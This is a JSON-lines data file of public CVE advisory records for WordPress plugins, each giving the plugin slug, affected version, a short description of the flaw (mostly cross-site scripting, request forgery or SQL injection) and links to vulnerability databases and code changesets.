{"CVE_ID":"CVE-2025-8293","slug":"intl-datetime-calendar","versionImpact":"1.0.1","description":"The Intl DateTime Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018date\u2019 parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/intl-datetime-calendar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/intl-datetime-calendar\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc333949-de1e-493a-badd-3be1c9060503?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc333949-de1e-493a-badd-3be1c9060503?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0381","slug":"gigpress","versionImpact":"2.3.28","description":"The GigPress WordPress plugin through 2.3.28 does not validate and escape some of its shortcode attributes before using them in SQL statement\/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c964fa-6d8d-404d-ac38-72f6f88d203c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c964fa-6d8d-404d-ac38-72f6f88d203c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4393","slug":"ecommerce-product-catalog","versionImpact":"3.0.17","description":"The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.0.17. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save manual digital orders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ecf3d5-1457-405a-8856-517c7d2f2db1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12ecf3d5-1457-405a-8856-517c7d2f2db1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473569\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/orders\\\/includes\\\/register-digital-orders.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473569\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/orders\\\/includes\\\/register-digital-orders.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25453","slug":"wptables","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Ian Sadovy WordPress Tables plugin <=\u00a01.3.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wptables\\\/wordpress-wordpress-tables-plugin-1-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wptables\\\/wordpress-wordpress-tables-plugin-1-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4479","slug":"jeg-elementor-kit","versionImpact":"2.6.5","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sg_general_toggle_tab_enable and sg_accordion_style attributes within the plugin's JKit - Tabs and JKit - Accordion widget, respectively, in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6048ba9-671f-4729-9618-d7a0556a31e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6048ba9-671f-4729-9618-d7a0556a31e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-tabs-view.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-tabs-view.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-view-abstract.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-view-abstract.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-accordion-view.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.5\\\/class\\\/elements\\\/views\\\/class-accordion-view.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102228\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102228\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6547","slug":"add-admin-css","versionImpact":"2.0.1","description":"The Add Admin CSS plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0.1.  This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0064244b-72a4-486d-aaad-be1f57e4a8a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0064244b-72a4-486d-aaad-be1f57e4a8a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-admin-css\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-admin-css\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8197","slug":"visual-sound","versionImpact":"1.03","description":"The Visual Sound plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.03. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48d6d4c1-cc87-4c2c-9fbb-90af62f576aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48d6d4c1-cc87-4c2c-9fbb-90af62f576aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88cacd47-d900-478c-b833-c6c55fd4b082\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88cacd47-d900-478c-b833-c6c55fd4b082\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8917","slug":"football-leagues-by-anwppro","versionImpact":"0.16.7","description":"The AnWP Football Leagues plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 0.16.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29a160ea-5582-4028-8621-7988e3a8cabf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29a160ea-5582-4028-8621-7988e3a8cabf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/class-anwp-football-leagues.php#L675\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/class-anwp-football-leagues.php#L675\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/football-leagues-by-anwppro\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/football-leagues-by-anwppro\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153845\\\/football-leagues-by-anwppro\\\/trunk\\\/class-anwp-football-leagues.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153845\\\/football-leagues-by-anwppro\\\/trunk\\\/class-anwp-football-leagues.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153845\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153845\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9446","slug":"wp-simple-anchors-links","versionImpact":"1.0.0","description":"The WP Simple Anchors Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpanchor shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d851ad1f-be74-49eb-9c0d-c1b309581209?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d851ad1f-be74-49eb-9c0d-c1b309581209?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-anchors-links\\\/trunk\\\/wpsimpleanchorslinks_class.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-anchors-links\\\/trunk\\\/wpsimpleanchorslinks_class.php#L221\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-anchors-links\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-simple-anchors-links\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9442","slug":"element-ready-lite","versionImpact":"1.9.0","description":"The F4 Improvements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/element-ready-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/element-ready-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b97a555a-1eeb-4fc4-9338-bad8b9a0585d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b97a555a-1eeb-4fc4-9338-bad8b9a0585d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11748","slug":"taeggie-feed","versionImpact":"0.1.9","description":"The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'taeggie-feed' shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taeggie-feed\\\/trunk\\\/taeggie_feed.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taeggie-feed\\\/trunk\\\/taeggie_feed.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207857%40taeggie-feed&new=3207857%40taeggie-feed&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207857%40taeggie-feed&new=3207857%40taeggie-feed&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taeggie-feed\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taeggie-feed\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d11459-5cad-4d8b-a81d-7f0dd4342a52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d11459-5cad-4d8b-a81d-7f0dd4342a52?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8857","slug":"wp-auctions","versionImpact":"3.7","description":"The WordPress Auction Plugin WordPress plugin through 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08ca6daa-09f4-4604-ac9e-15a1b33d599d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08ca6daa-09f4-4604-ac9e-15a1b33d599d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3180","slug":"wpgateway","versionImpact":"3.5","description":"The WPGateway Plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 3.5. This allows unauthenticated attackers to create arbitrary malicious administrator accounts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2022\\\/09\\\/psa-zero-day-vulnerability-in-wpgateway-actively-exploited-in-the-wild\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2022\\\/09\\\/psa-zero-day-vulnerability-in-wpgateway-actively-exploited-in-the-wild\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/wpgateway\\\/wpgateway-35-unauthenticated-privilege-escalation\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/wpgateway\\\/wpgateway-35-unauthenticated-privilege-escalation\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0957","slug":"smtp-amazon-ses","versionImpact":"1.7.1","description":"The SMTP for Amazon SES \u2013 YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smtp-amazon-ses\\\/trunk\\\/includes\\\/Helper\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234351\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234351\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-amazon-ses\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smtp-amazon-ses\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6424fc9-f118-4654-89a7-1f7e6efa2c02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6424fc9-f118-4654-89a7-1f7e6efa2c02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0629","slug":"coronavirus-covid-19-notice-message","versionImpact":"1.1.2","description":"The Coronavirus (COVID-19) Notice Message WordPress plugin through 1.1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c36d6d-5522-422b-b890-524e27e67f7c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c36d6d-5522-422b-b890-524e27e67f7c\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c36d6d-5522-422b-b890-524e27e67f7c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39c36d6d-5522-422b-b890-524e27e67f7c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7686","slug":"weichuncai","versionImpact":"1.5","description":"The weichuncai(WP???) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the sm-options.php page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weichuncai\\\/trunk\\\/sm-options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/weichuncai\\\/trunk\\\/sm-options.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe46ec14-4795-4ac7-afd0-de92ccef877d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe46ec14-4795-4ac7-afd0-de92ccef877d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4349","slug":"process-steps-template-designer","versionImpact":"1.2.1","description":"The Process Steps Template Designer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to conduct unspecified attacks via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473649\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473649\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2acd40d5-8a9c-4ca8-9c89-5bf639b1c66c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2acd40d5-8a9c-4ca8-9c89-5bf639b1c66c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4392","slug":"ecommerce-product-catalog","versionImpact":"2.9.43","description":"The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.9.43. This is due to missing or incorrect nonce validation on the implecode_save_products_meta() function. This makes it possible for unauthenticated attackers to save product meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2eb963dd-41c3-43cd-afb7-1be054829ea3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2eb963dd-41c3-43cd-afb7-1be054829ea3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368356%40ecommerce-product-catalog&new=2368356%40ecommerce-product-catalog&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368356%40ecommerce-product-catalog&new=2368356%40ecommerce-product-catalog&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4500","slug":"order-tracking","versionImpact":"3.3.6","description":"The Order Tracking Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the order status parameter in versions up to, and including, 3.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers (admin or higher) to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81f9a4c6-971f-4f6d-8bb1-e97bf75cf8d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81f9a4c6-971f-4f6d-8bb1-e97bf75cf8d3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2959453%40order-tracking%2Ftrunk&old=2949611%40order-tracking%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2959453%40order-tracking%2Ftrunk&old=2949611%40order-tracking%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
